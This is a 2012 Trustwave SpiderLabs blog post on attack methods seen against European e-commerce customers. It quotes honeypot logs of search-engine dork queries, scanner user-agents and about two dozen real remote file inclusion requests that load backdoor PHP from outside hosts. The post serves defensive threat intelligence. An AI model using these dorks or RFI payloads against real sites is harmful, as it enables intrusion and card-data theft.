Common Attack Methodologies Identified in European Customers

As you may have heard, Trustwave SpiderLabs released our Global Security Report (GSR) 2012 Report, which highlights a vast amount of valuable data from our 2011 engagements. In this blog post, I want to highlight a specific section of the GSR which highlights specific attack methodologies used by attackers against our customers in Europe.

There is a section in the GSR dedicated to our Europe, Middle East and Asia (EMEA) region customers. Solomon Bhala, who is a Security Consultant on the Trustwave SpiderLabs Incident Response Team, outlined the following with regards to differenct attack vectors in use in the European region:

In contrast to data compromise trends in the Americas, very few data compromises occurred in POS networks in Europe, the Middle East and Africa (EMEA). Rather, as a result of higher adoption of "chip & pin" (EMV) and deprecation of magnetic stripe (mag-stripe) transactions within Europe, fewer opportunities exist in EMEA for the theft of track data used in mag-stripe transactions.

However, across the region many mag-stripe enabled POS systems remain in use to support mag-stripe only cards or transactions that fall back to mag-stripe when EMV fails. As such, card-present compromises do still occur in small numbers.

Overwhelmingly, e-commerce merchants in EMEA were the targets for cyber criminals. E-commerce businesses allow attackers to be geographically indiscriminate and concerned only with identifying targets that pose little technical complexity in compromising.

The typical vulnerabilities exploited in EMEA investigations were insecure, but legitimate file upload mechanisms or exploitable remote file inclusion vectors.

The typical attack flow looks something like this:

Screen shot 2012-02-13 at 9.21.23 AM

Source: Tustwave's 2012 Global Security Report

The SpiderLabs Research Team has also gathered data from web honeypot systems that confirm this type of attack methodology.

Using Search Engines to Identify Targets

Attackers will often use search engine queries as a method of quickly identifying web sites that have certain characterisics for the vulnerabilties they are looking to exploit. When search engine results are returned, the attacker then has a list of possible target websites to launch attacks. Here are some example Referer data taken from the logs from our web honeypots showing use of search engine usage to identify common vulnerable apps:

http://www.google.com/m?client=ms-aff-ucweb&output=xhtml&hl=en&q=inurl%3a+admin%2f+login.phphttp://www.google.com/m?client=ms-opera-mini&channel=new&q=inurl%3A+log.Txthttp://www.google.com/m?cx=partner-mb-pub-6630117049886772:7963048852&ie=utf8&hl=en&q=inurl%3A%20admin/login.phphttp://www.google.com/m?cx=partner-mb-pub-6630117049886772:7963048852&ie=utf8&hl=en&q=inurl%3A%20adminlogin.phphttp://yandex.ru/yandsearch?text=biz+inurl:/gbook+sign.asp
http://yandex.ru/yandsearch?text=car+used+inurl:/light.cgi?page=
http://yandex.ru/yandsearch?text=check+inurl:/guestbook.asp
http://yandex.ru/yandsearch?text=coid+inurl:/write.asp
http://yandex.ru/yandsearch?text=dates+inurl:/modules.php?name=
http://yandex.ru/yandsearch?text=devalues+inurl:/register+intext:%22upcoming%22+intext:%22published%22+intext:%22submit%22+-inurl:.php+intitle:%22register%22
http://yandex.ru/yandsearch?text=dictionary+inurl:/bbs.cgi?id=
http://yandex.ru/yandsearch?text=event+inurl:/minibbs.cgi?log=
http://yandex.ru/yandsearch?text=harder+inurl:/bbs.cgi?id=
http://yandex.ru/yandsearch?text=inurl:%22blog
http://yandex.ru/yandsearch?text=inurl:_articles.php?homeid=
http://yandex.ru/yandsearch?text=inurl:/fckeditor/editor/filemanager
http://yandex.ru/yandsearch?text=inurl:/index.php?action=stats altered states wikipedia
http://yandex.ru/yandsearch?text=inurl:/index.php?action=stats sanctioning body sports
http://yandex.ru/yandsearch?text=inurl:/index.php?action=stats what accomplishments to put on a resume
http://yandex.ru/yandsearch?text=inurl:/modules.php?name= questions and solutions engineering
http://yandex.ru/yandsearch?text=inurl:/register+intext:%22upcoming%22+intext:%22published%22+intext:%22submit%22+-inurl:.php+intitle:%22register%22+connection
http://yandex.ru/yandsearch?text=inurl:/register+intext:%22upcoming%22+intext:%22published%22+intext:%22submit%22+-inurl:.php+intitle:%22register%22+finance
http://yandex.ru/yandsearch?text=inurl:/register.php+north
http://yandex.ru/yandsearch?text=inurl:/register.php+you
http://yandex.ru/yandsearch?text=inurl:/?show=guestbook&lr=213
http://yandex.ru/yandsearch?text=kept+inurl:/bbs.cgi?id=
http://yandex.ru/yandsearch?text=library+inurl:/bbs.cgi?room=
http://yandex.ru/yandsearch?text=op+inurl:/gbook.cgi?user=
http://yandex.ru/yandsearch?text=print+inurl:/guestbook.php
http://yandex.ru/yandsearch?text=provide+inurl:/bbs.cgi?room=
http://yandex.ru/yandsearch?text=systems+inurl:/board.cgi?action=
http://yandex.ru/yandsearch?text=visits+inurl:/postcards.php?image_id=
http://yandex.ru/yandsearch?text=zi+inurl:/profile.php?id=

Using Vulnerability Scanning Tools/Scripts

Here are a few of the top vulnerability scanner/script names taken from the User-Agent fields of our web honeypot logs:

DataCha0s/2.0Gootkit auto-rooter scannerMade by ZmEu @ WhiteHat Team - www.whitehat.roMaMa CaSpErMorfeus Fucking ScannerZmEu

Exploit Remote File Inclusion Vulnerabilty

Remote File Inclusion vulnerabilities are being extensively targted by attackers as a means to either execute php code or download a trojan backdoor application. Here are some RFI attack payloads that we gathered from our web honeypot just for today:

GET /become_editor.php?theme_path=http://www.univerzum.de/allnett.jpg?? HTTP/1.1
GET /become_editor.php?theme_path=http://www.univerzum.de/byroee.jpg?? HTTP/1.1
GET /become_editor.php?theme_path=?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1
GET //manager/admin/index.php?MGR=http://www.ralphlaurenukonlineshop.com/list.txt????? HTTP/1.1
GET //php/init.poll.php?include_class=http://www.nettunoresidence.it/wp-content/themes/N7.jpg?? HTTP/1.1
GET //php/init.poll.php?include_class=http://www.nettunoresidence.it/wp-content/themes/N8.jpg?? HTTP/1.1
GET //?_SERVER[DOCUMENT_ROOT]=http://www.triz.or.kr//data/log/auto1.txt?? HTTP/1.1
GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://popsiclesocial.com/mmstaging//wp-admin/user/?? HTTP/1.1
GET //wp-content/plugins/wp_rokstories/?src=http://udassham.com//air.php HTTP/1.1
GET //wp-content/themes/arras/library/timhumb.php?src=http://blogger.com.mesco.com.vn/login.php HTTP/1.1
GET //wp-content/themes/arras/library/widgets.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1
GET /wp-content/themes/cadabrapress/scripts/?src=http://blogger.com.3085.a.hostable.me/myid.php HTTP/1.1
GET /wp-content/themes/cadabrapress/scripts/?src=http://flickr.com.javafootwear.com/vegetable.php HTTP/1.1
GET /wp-content/themes/cadabrapress/scripts/_tbs.php?src=http://picasa.com.amplarh.com.br/stun.php HTTP/1.1
GET //wp-content/themes/DeepFocus/_tbs.php?src=http://blogger.com.herzelconsultores.com.ar/shell.php HTTP/1.1
GET ///wp-content/themes/editorial/functions/?src=http://blogger.com.antesagoradepois.com/depois.php HTTP/1.1
GET //wp-content/themes/Magnificent/_tbs.php?src=http://picasa.com.fuckfashionwearart.com/injekan/injekan.php HTTP/1.1
GET ///wp-content/themes/optimize/?src=http://blogger.com.antesagoradepois.com/depois.php HTTP/1.1
GET //wp-content/themes/Polished/_tbs.php?src=http://picasa.com.amplarh.com.br/stun.php HTTP/1.1
GET //wp-content/themes/prosto/functions/?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1
GET //wp-content/themes/sakura/plugins/woo-tumblog/functions/_tbs.php?src=http://picasa.com.fuckfashionwearart.com/injekan/injekan.php HTTP/1.1
GET //wp-content/themes/telegraph/scripts/?src=http://img.youtube.com.uscd.ro/bogel.php HTTP/1.1
GET //wp-?src=http://flickr.com.bpmohio.com/byroe.php HTTP/1.1
GET //wp-?src=http://flickr.com.bpmohio.com/spread.php HTTP/1.1

Each of these files referenced by the http off site payload is some type of PHP code or backdoor. Once the backdoor/trojan web page is installed, the attacker can then use it to do the following:

Search local files for credit card holder data:

Screen shot 2012-02-13 at 3.33.25 PM

Directly connect to the database listener to search for records.

This is possible as many ACLs allow access from the localhost. This also allows the attacker to execute SQL queries that may not have been possible through SQL Injection vulnreablities in the web application:

Screen shot 2012-02-13 at 3.33.50 PM

Webcast Tomorrow

If you would like more information about these types of attacks, please join the Trustwave Webcast tomorrow with John Yeo, Director of SpiderLabs - EMEA.

Trustwave reserves the right to review all comments in the discussion below. Please note that for security and other reasons, we may not approve comments containing links.